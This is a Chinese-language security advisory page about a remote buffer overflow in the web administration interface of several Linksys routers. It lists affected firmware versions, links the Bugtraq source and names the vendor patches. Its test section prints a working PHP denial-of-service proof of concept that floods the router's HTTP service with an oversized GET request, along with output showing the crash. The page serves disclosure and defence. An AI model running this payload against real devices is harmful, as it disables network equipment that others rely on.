首页 -> 安全研究
安全研究
安全漏洞
多个Linksys设备GET请求远程缓冲区溢出漏洞
发布日期:2002-12-03
更新日期:2002-12-10
受影响系统:
Linksys EtherFast BEFSR41 Router 1.43不受影响系统:
Linksys EtherFast BEFSR41 Router 1.42.7
Linksys EtherFast BEFSR41 Router 1.42.3
Linksys EtherFast BEFN2PS4 Router 1.42.7
Linksys EtherFast BEFSR81 Router 2.42.7
Linksys EtherFast BEFSR11 Router 1.43
Linksys EtherFast BEFSR11 Router 1.42.7
Linksys EtherFast BEFSR11 Router 1.42.3
Linksys EtherFast BEFSRU31 Router 1.43
Linksys EtherFast BEFSRU31 Router 1.42.7
Linksys EtherFast BEFSRU31 Router 1.42.3
Linksys BEFW11S4 1.43.3
Linksys BEFW11S4 1.4.3
Linksys BEFW11S4 1.4.2.7
Linksys BEFSX41 1.43.4
Linksys BEFSX41 1.43.3
Linksys BEFSX41 1.43
Linksys EtherFast BEFSR41 Router 1.44描述:
Linksys EtherFast BEFN2PS4 Router 1.44
Linksys EtherFast BEFSR81 Router 2.44
Linksys EtherFast BEFSR11 Router 1.44
Linksys EtherFast BEFSRU31 Router 1.44
Linksys BEFW11S4 1.44
Linksys BEFSX41 1.44
BUGTRAQ ID: 6301
Linksys开发了多种宽带路有器设备,包括了BEFW11S4、BEFSRU31等,其中包含通过HTTP管理的WEB管理接口。
多个Linksys设备对超长GET请求缺少正确处理,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击,停止对正常通信的响应。
由于设备不充分分配内存缓冲区,攻击者可以利用这个漏洞发送超长GET请求给有此漏洞的Linksys设备,当设备尝试处理畸形输入时可导致破坏内存信息,使设备崩溃,停止响应。
<*来源:CORE
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103893609009727&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
* LinkSys Wireless ADSL Router httpd DoS Vulnerability
*
* Product : Linksys (Division of Cisco Systems)
* Device : WAG54G V.2
* Firmware: 1.02.20
* Notes : Other devices and firmware versions are no doubt vulnerable.
*
* Written by: r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*
* Sending a large HTTP GET/POST request (10240) to the router results in DoS
* of the httpd service.
*
* After discovering this vulnerability I read about similar vulnerabilities
* in different devices. It would seem this device is vulnerable to more
* previously disclosed vulnerabilities also, just this device was not tested.
*
* It has been suggested that this is a stack overflow vulnerability.
* http://www.securiteam.com/securitynews/5NP0D15GUE.html
* http://www.securityfocus.com/bid/6301/info
*
* unable to connect to 192.168.1.1:80 (Connection refused)
*
* r0ut3r@kit:~> nmap 192.168.1.1
*
* Starting Nmap 4.20 ( http://insecure.org ) at 2008-12-12 12:17 EST
* Interesting ports on 192.168.1.1:
* Not shown: 1695 closed ports
* PORT STATE SERVICE
* 23/tcp open telnet
* 443/tcp open https
*
* Nmap finished: 1 IP address (1 host up) scanned in 7.403 seconds
*
* Looks like HTTP died...
* HTTPS is running however you cannot login. The service is basically useless.
* Telnet is also open for administration (if configured to be).
*
* Apart from not being able to use the Web Administration Interface the device
* seems to function fine.
*/
set_time_limit(0);
$host = "192.168.1.1"; //Default IP is 192.168.1.1
if (isset($argv[1]))
$host = $argv[1];
$port = 80;
echo "Connecting...\n";
$conn = fsockopen($host, $port, $errno, $errstr);
if ($conn)
{
$payload = "GET /".str_repeat('A', 10240)." HTTP/1.1";
if (fwrite($conn, $payload))
echo "Payload sent!\n";
fclose($conn);
}
?>
建议:
厂商补丁:
Linksys
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.linksys.com/download/
- Linksys BEFSR41 / BEFSR11 / BEFSRU31. Firmware v. 1.44
- Linksys BEFSR81. Firmware v. 2.44
- Linksys BEFVP41. Firmware v. 1.40.4
- Linksys BEFSX41. Firmware v. 1.44
- Linksys BEFW11S4 ver2. Firmware v. 1.44
浏览次数:2909
严重程度:10(网友投票)
绿盟科技给您安全的保障